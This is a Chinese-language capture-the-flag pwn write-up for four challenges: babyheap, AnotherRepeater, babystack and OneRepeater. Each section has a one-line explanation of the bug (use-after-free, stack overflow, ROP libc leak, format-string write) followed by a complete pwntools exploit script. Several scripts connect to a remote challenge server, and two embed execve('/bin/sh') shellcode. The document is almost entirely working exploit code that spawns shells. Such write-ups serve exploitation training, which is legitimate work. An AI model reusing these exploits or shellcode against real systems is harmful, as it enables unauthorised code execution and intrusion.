PWN
0x01 babyheap
文件下载 babyheap
导入IDA分析,发现UAF漏洞,只需要覆盖函数指针为system即可,然后F12发现"/bin/sh",所以可以直接传参到system函数,直接拿到shell
附上exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| from pwn import *
context.log_level = "debug"
sh = process("./babyheap")
elf = ELF("babyheap")
def add(s):
sh.recvuntil("Your choice: ");
sh.sendline("1")
sh.recvuntil("Please input size:")
sh.sendline(str(len(s)))
sh.recvuntil("Please input content:")
sh.send(s)
def delete(index):
sh.recvuntil("Your choice: ")
sh.sendline("2")
sh.recvuntil("Please input list index: ")
sh.sendline(index)
def show(index):
sh.recvuntil("Your choice: ");
sh.sendline("3")
sh.recvuntil("Please input list index:")
sh.sendline(index)
add('a'*32)
add('a'*32)
delete("0")
delete("1")
add(p64(0x0000000000602010)+p64(elf.plt['system']))
show("0")
sh.interactive()
|
0x02 AnotherRepeater
文件下载 AnotherRepeater
附上exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| from pwn import *
context.log_level = "debug"
sh = remote("140.82.19.20",37621)
#sh = process("./AnotherRepeater")
elf = ELF("AnotherRepeater")
sh.recvuntil("Be careful. How many chars you want to reapeat?")
sh.sendline("-1")
sh.recv()
stack_addr = int(sh.recv(8),16)
offset = 1055
payload = "\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"
payload = payload.ljust(offset,'a')
payload = payload + p32(stack_addr)
sh.sendline(payload)
sh.interactive()
|
0x03 babystack
文件下载 babystack
附上exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| from pwn import *
from time import *
context.log_level = "debug"
sh = process("./babystack")
elf = ELF("babystack")
pop_rdi_ret = 0x0000000000400ad3
pop_rsi_r15_ret = 0x0000000000400ad1
leave_ret = 0x0000000000400a18
sh.recv()
sleep(3)
sh.recvuntil(">")
sh.sendline("224")
sh.recvuntil("Your message will be saved at 0x")
stack_addr = int(sh.recv(12),16)
print stack_addr
payload = 'a'*8 + p64(pop_rdi_ret) + p64(elf.got['__libc_start_main']) + p64(elf.plt['puts'])
payload += p64(0x0000000000400800)
payload = payload.ljust(208,'a') + p64(stack_addr) + p64(leave_ret)
sh.send(payload)
sh.recvuntil("bye~\n",True)
libc_addr = u64(sh.recv(6)+"\x00\x00")
log.success("__libc_start_main value = " + hex(libc_addr))
sh.recv()
sleep(3)
sh.recvuntil(">")
sh.sendline("224")
sh.recvuntil("Your message will be saved at 0x")
stack_addr = int(sh.recv(12),16)
payload = 'a'*8 + p64(pop_rdi_ret) + p64(libc_addr+0x1923ea) + p64(libc_addr+0x2d990+0x1B)
payload = payload.ljust(208,'a') + p64(stack_addr) + p64(leave_ret)
sh.send(payload)
sh.interactive()
|
0x04 OneRepeater
文件下载 OneRepeater
附上exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| from pwn import *
context.log_level = "debug"
sh = remote("140.82.19.20",36427)
#sh = process("./OneRepeater")
elf = ELF("OneRepeater")
sh.recvuntil("What you want to do?\n1) Input someing exciting to repeat!\n2) repeating!!!\n3) Exit\n")
sh.sendline("1")
data = int(sh.recv(8),16)
payload = p32(data+0x40C+0x4*4) +"%." +str((data % 0x10000)+0x100-5) +"d%16$hn"
sh.sendline(payload)
sh.recvuntil("3) Exit\n")
sh.sendline("2")
sh.sendline("1")
sh.recvuntil("3) Exit\n")
payload = p32(data+0x40C+0x4*4+2) +"%." +str((data >> 16) - 5) +"d%16$hn"
payload = payload.ljust(0x100,"a") + "\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"
sh.sendline(payload)
sh.sendline("2")
sh.recvuntil("Exit\n")
sh.sendline("3")
log.success("buf_addr = "+hex(data))
sh.interactive()
|
